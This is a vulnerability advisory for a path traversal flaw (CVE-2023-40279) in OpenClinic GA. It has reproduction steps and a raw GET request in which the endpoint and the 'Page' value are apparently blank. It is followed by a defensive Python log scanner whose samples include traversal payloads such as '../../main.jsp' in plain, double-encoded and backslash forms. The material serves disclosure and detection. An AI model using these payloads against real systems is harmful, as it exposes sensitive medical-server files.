# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)  
# Date: 2023-08-14  
# Exploit Author: V. B.  
# Vendor Homepage:  
# Software Link:  
# Version: OpenClinic GA 5.247.01  
# Tested on: Windows 10, Windows 11  
# CVE: CVE-2023-40279  
# Details  
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to ''. This vulnerability allows for the retrieval and execution of files from arbitrary directories.  
# Proof of Concept (POC)  
Steps to Reproduce:  
1. Crafting the Malicious GET Request:  
- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.  
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):  
```
GET /openclinic/ HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
2. Confirming the Vulnerability:  
- Send the crafted GET request to the target server.  
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.  
- This vulnerability can lead to sensitive information disclosure or more severe attacks.
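
For defenders reviewing web server access logs, the following added example (not part of the original advisory or the vendor's code) flags requests whose `Page` parameter resolves outside the include directory, including double-encoded and backslash variants. It assumes combined-format access logs; `EXAMPLE.jsp` is a placeholder because the advisory does not name the endpoint, and all log lines are constructed.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Undo repeated percent-encoding (e.g. %252e -> %2e -> .)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(page_value):
    """True if the Page value would resolve outside the include directory."""
    path = fully_decode(page_value).replace("\\", "/")  # Windows separators
    if path.startswith("/") or re.match(r"[A-Za-z]:", path) or "\x00" in path:
        return True  # absolute path, drive letter, or NUL byte
    normalized = posixpath.normpath(path)
    return normalized == ".." or normalized.startswith("../")

def flag_traversal(log_lines, param="Page"):
    """Return (line_number, decoded_value) for each escaping Page value."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl already percent-decodes each value once
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == param and escapes_base(value):
                hits.append((number, fully_decode(value)))
    return hits

# Constructed sample log lines; EXAMPLE.jsp is a placeholder endpoint name.
PREFIX = '203.0.113.5 - - [14/Aug/2023:10:00:0%d +0000] "GET /openclinic/EXAMPLE.jsp?Page=%s HTTP/1.1" 200 512'
SAMPLE_LOG = [PREFIX % (i, page) for i, page in enumerate([
    "reports/summary.jsp",                      # stays inside the base
    "../../main.jsp",                           # value from the advisory
    "%252e%252e%252f%252e%252e%252fmain.jsp",   # double-encoded
    "..%5c..%5cmain.jsp",                       # backslash separators
    "help/../reports/summary.jsp",              # dot-dot that stays inside
], start=1)]
```

Values that contain `..` but normalize to a path still inside the base directory are deliberately not flagged, which keeps the alert focused on requests that actually leave it.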